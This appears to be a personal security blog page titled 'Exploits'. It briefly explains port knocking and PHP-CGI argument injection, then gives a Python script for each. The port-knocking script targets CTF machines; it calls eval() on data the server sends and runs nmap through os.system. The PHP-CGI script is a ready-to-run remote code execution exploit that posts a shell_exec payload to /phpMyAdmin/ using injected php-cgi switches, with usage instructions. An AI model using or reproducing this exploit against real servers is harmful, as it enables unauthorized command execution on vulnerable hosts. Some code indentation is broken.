Home Blogs Profile Contribution Policies Contact About

Exploits



Port Knocking

In computer networking, port knocking is a method of externally opening ports on a firewall by generating a connection attempt on a set of prespecified closed ports. Once a correct sequence of connection attempts is received, the firewall rules are dynamically modified to allow the host which sent the connection attempts to connect over specific ports. A variant called single packet authorization (SPA) exists, where only a single "knock" is needed, consisting of an encrypted packet.

The primary purpose of port knocking is to prevent an attacker from scanning a system for potentially exploitable services by doing a port scan, because unless the attacker sends the correct knock sequence, the protected ports will appear closed.
Many CTFs port knocking used as network challenges. Below you can find the script to automate this proccess. If you find open port with "waste" services, you can try below script.

from socket import * 
from itertools import permutations
import time
import os

ip="192.168.0.107" # Machine ip
Port=1337 # Machine port

s=socket(AF_INET, SOCK_STREAM)
s.connect((ip, Port))
port_list=eval(s.recv(1024))
print("# received ports: ", port_list)
for port in permutations(port_list, 3):
try:
    print("-> Port: ", port)
    s2=socket(AF_INET, SOCK_STREAM)
    s2.connect((ip, port))
    print(s2.recv(1024))
except:
    pass
    time.sleep(1)
os.system("nmap -F "+ip)
print("$ Done !!!")




PHP CGI Argument Injection

PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. When PHP is used in a CGI-based setup (such as Apache's mod_cgid), the php-cgi receives a processed query string parameter as command line arguments which allows command-line switches, such as -s, -d or -c to be passed to the php-cgi binary, which can be exploited to disclose source code and obtain arbitrary code execution. For more read here.
Usage: python file.py 192.168.0.100 80

# Use Python2
import socket
import sys

def cgi_exploit():
pwn_code="""<?php
$output=shell_exec('whoami');
echo "<pre>$output</pre>";
?>""" 
post_Length=len(pwn_code)
http_raw="""POST /phpMyAdmin/?-dallow_url_include%%3don+-dauto_prepend_file%%3dphp://input HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded
Content-Length: %s

%s
""" %(HOST , post_Length ,pwn_code)
print http_raw
try:
    sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((HOST, int(PORT)))
    sock.send(http_raw)
    data=sock.recv(10000)
    print repr(data)
    sock.close()
except socket.error, msg:
    sys.stderr.write("[ERROR] %s\n" % msg[1])
    sys.exit(1)

if __name__=='__main__':
    try:
        HOST=sys.argv[1]
        PORT=sys.argv[2]
        cgi_exploit()
    except IndexError:
        print '[+]Usage: cgi_test.py site.com 80'
        sys.exit(-1) 




Remote Windows Kernal Crash

Comming Soon...





Comment Section:

Writer: You can write a comment to help me to improve this blog or ask below


Write a Comment








I also think you'll like..





More Blogs
Back to top ↑